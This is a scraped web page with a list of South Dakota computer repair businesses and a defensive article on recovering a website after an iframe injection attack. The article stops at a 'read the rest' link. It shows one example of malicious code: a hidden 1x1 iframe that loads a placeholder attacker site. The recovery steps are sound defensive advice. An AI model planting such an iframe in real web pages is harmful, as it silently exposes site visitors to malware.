ComputerUser.com

IFrame Injection Attack: Cross Site Scripting (XSS) Tutorials Yankton SD

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

Sioux Falls PC Pro
(605) 321-0468
Sioux Falls, SD
Firewall Technologies
(605) 940-5498
2008 S Jefferson Ave
Sioux Falls, SD
Integrated Business Solutions
(605) 697-3060
422 4th Street
Brookings, SD
Micro Solutions
(605) 341-4152
1730 Haines Avenue
Rapid City, SD
Computer One
(605) 886-6211
1028 14th Street Southeast
Watertown, SD
Micro Fix Inc
(605) 224-9831
357 S Pierre Street
Pierre, SD
Mikes Amazing Computer Solutions
(605) 450-0560
Frankfort, SD
Computer One
(605) 692-4349
102 Main Avenue South
Brookings, SD
Nortek Computers
(605) 697-9042
1206 Main Avenue South
Brookings, SD
Advanced Computer System
(605) 721-8874
1211 E Saint Francis Street
Rapid City, SD
Data Provided by:
 
Provided By:

IFrame Injection Attack: Cross Site Scripting (XSS) Tutorials

IFrame Injection Attack is most common and most basic cross site scripting (XSS) attacks
Written by Vijay Patil

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period

It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords

Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis

You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy

Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website.

5. Test the website and reopen

This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated

In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis

Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attac...
Click here to read the rest of this article from Computer User